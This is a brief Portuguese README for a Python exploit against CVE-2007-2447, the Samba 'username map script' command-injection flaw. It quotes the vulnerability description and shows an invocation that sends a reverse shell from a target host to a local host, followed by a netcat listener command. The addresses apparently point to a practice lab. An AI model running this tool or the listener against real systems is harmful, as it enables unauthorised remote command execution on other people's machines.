
Exploit em Python para CVE-2007-2447 visando a vulnerabilidade de script de mapeamento de nome de usuário do Samba, permitindo execução remota de comandos via metacaracteres de shell com entrega de payload de shell reverso.
"A funcionalidade MS-RPC no smbd no Samba 3.0.0 até 3.0.25rc3 permite que atacantes remotos executem comandos arbitrários através de metacaracteres de shell envolvendo a função (1) SamrChangePassword, quando a opção "username map script" do smb.conf está habilitada, e permite que usuários autenticados remotos executem comandos através de metacaracteres de shell envolvendo outras funções MS-RPC no (2) gerenciamento de impressora remota e (3) compartilhamento de arquivos."
[*] Este exploit requer Python 3.7 ou superior
python3 -m pip install pysmb
$ ./CVE-2007-2447.py --rhost 10.10.10.3 --lhost 10.10.14.10 --lport 4444 --rport 445
--rhost -- Host Remoto--lhost -- Host Local--lport -- Porta Local--rport -- Porta Remota [*] Opcional. padrão=445Não se esqueça de iniciar seu listener:
nc -lvnp 4444
